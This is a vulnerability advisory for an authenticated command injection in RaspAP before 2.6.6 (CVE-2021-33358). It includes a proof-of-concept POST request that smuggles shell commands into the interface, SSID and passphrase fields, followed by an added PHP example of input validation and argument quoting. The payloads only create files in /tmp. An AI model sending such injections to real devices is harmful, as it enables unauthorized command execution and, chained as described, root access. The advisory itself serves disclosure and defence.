Authenticated Command Injection Vulnerability Discovered In RaspAP: CVE-2021-33358 / CX-2021-4796

Severity

Severity: 9.9 - Critical Severity

Summary

RaspAP prior to version 2.6.6 is vulnerable to Authenticated Command Injection.

Product

RaspAP prior to 2.6.6

Impact

An authenticated attacker can execute arbitrary OS commands on any RaspAP instance prior to 2.6.6. This can be chained with a privilege escalation exploit (CVE-2021-33356) to achieve root access.

Steps To Reproduce

  1. After authenticating, send the following POST request to the RaspAP host:
POST /hostapd_conf HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 355
Origin: http://localhost
Authorization: Basic YWRtaW46c2VjcmV0
Connection: close
Referer: http://localhost/hostapd_conf
Cookie: PHPSESSID=j99hb7n50dp4d26no5ccnjhf2o
Upgrade-Insecure-Requests: 1

csrf_token=ce138993d5ecd5d041fb805425ab069d700251a1be50e2ade5d51c5fa084f282&interface=lo;touch%20/tmp/checkinterface;&ssid=%24%28touch+%2Ftmp%2Fcheckssid%29&hw_mode=g&channel=1&wpa=2&wpa_pairwise=CCMP&wpa_passphrase=%24%28touch+%2Ftmp%2Fcheckpass%29&beaconintervalEnable=1&beacon_interval=100&max_num_sta=&country_code=AF&SaveHostAPDSettings=Save+settings

The injectable parameters are “interface”, “ssid” and “wpa_passphrase”.

Expected Result:

The request will write empty files to /tmp/checkinterface, /tmp/checkssid and /tmp/checkpass.

Remediation

This issue was fixed in version 2.6.6 through commit cae2031 (see Resources).
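The advisory does not reproduce the fix itself. As an added example (not RaspAP's code and not the 2.6.6 patch), the PHP below shows the defensive pattern that closes this bug class for the three injectable parameters: a strict allowlist for the interface name, length and printable-ASCII checks for the SSID and passphrase, writing hostapd.conf directly rather than through a shell, and escapeshellarg() on the one value that still reaches a command line. All function names and the sample values are constructed for this example; the proof-of-concept values are the ones from the request above.

```php
<?php
declare(strict_types=1);

// Added example, not RaspAP's code: allowlist validation for the three
// hostapd settings the advisory names as injectable (interface, ssid,
// wpa_passphrase) and safe handling of those values afterwards.
// Function names and sample values are constructed for this example.

/** Linux interface names: 1-15 bytes of [A-Za-z0-9_.-]; no shell metacharacters survive. */
function validateInterface(string $iface, ?array $knownInterfaces = null): bool
{
    if (preg_match('/^[A-Za-z0-9_.-]{1,15}$/', $iface) !== 1) {
        return false;
    }
    // Second check against interfaces that really exist on the host, when the caller supplies them.
    return $knownInterfaces === null || in_array($iface, $knownInterfaces, true);
}

/** SSID: 1-32 bytes, restricted to printable ASCII so it cannot inject newlines into hostapd.conf. */
function validateSsid(string $ssid): bool
{
    return preg_match('/^[\x20-\x7e]{1,32}$/', $ssid) === 1;
}

/** WPA passphrase: 8-63 printable ASCII characters (the 64-hex PSK form is not accepted here). */
function validatePassphrase(string $pass): bool
{
    return preg_match('/^[\x20-\x7e]{8,63}$/', $pass) === 1;
}

/**
 * Validate the POSTed settings and return the names of the rejected fields.
 * An SSID or passphrase may legitimately contain '$(' and similar characters;
 * that is acceptable only because those values are never handed to a shell below.
 */
function checkHostapdSettings(array $post, ?array $knownInterfaces = null): array
{
    $rejected = [];
    if (!validateInterface((string)($post['interface'] ?? ''), $knownInterfaces)) {
        $rejected[] = 'interface';
    }
    if (!validateSsid((string)($post['ssid'] ?? ''))) {
        $rejected[] = 'ssid';
    }
    if (!validatePassphrase((string)($post['wpa_passphrase'] ?? ''))) {
        $rejected[] = 'wpa_passphrase';
    }
    return $rejected;
}

/** Build hostapd.conf text directly; hostapd reads it literally, so no shell is involved. */
function buildHostapdConf(array $s): string
{
    return "interface={$s['interface']}\n"
         . "ssid={$s['ssid']}\n"
         . "wpa_passphrase={$s['wpa_passphrase']}\n"
         . "hw_mode=g\nchannel=1\nwpa=2\nwpa_pairwise=CCMP\n";
}

/** Where a shell command is unavoidable, quote every argument with escapeshellarg(). */
function buildLinkUpCommand(string $iface): string
{
    return 'ip link set ' . escapeshellarg($iface) . ' up';
}

// --- Demonstration with the advisory's proof-of-concept values (constructed input) ---
$known = ['wlan0', 'eth0', 'lo'];
$poc = [
    'interface'      => 'lo;touch /tmp/checkinterface;',
    'ssid'           => '$(touch /tmp/checkssid)',
    'wpa_passphrase' => '$(touch /tmp/checkpass)',
];
// Only 'interface' fails validation; the other two are syntactically valid
// values that are harmless once they never reach a shell.
echo 'Rejected fields: ' . implode(', ', checkHostapdSettings($poc, $known)) . "\n";

$good = ['interface' => 'wlan0', 'ssid' => 'MyNetwork', 'wpa_passphrase' => 'correct horse battery'];
if (checkHostapdSettings($good, $known) === []) {
    echo buildHostapdConf($good);
    echo buildLinkUpCommand($good['interface']) . "\n";
}

// Even an unvalidated interface value is neutralised by quoting: the whole
// string becomes one single-quoted argument instead of three commands.
echo buildLinkUpCommand($poc['interface']) . "\n";
```

Run it with `php example.php`. The design point is that only the interface name has a format strict enough for an allowlist; the SSID and passphrase are free-form by specification, so the real fix for those fields is to stop building shell command lines from them at all and write the configuration file directly.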

Properties

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

User Interaction: None

Scope: Changed

Confidentiality: High

Integrity: High

Availability: High

Credit

This issue was discovered and reported by Checkmarx Security Researcher Omri Inbar.

Resources

  1. Commit (cae2031)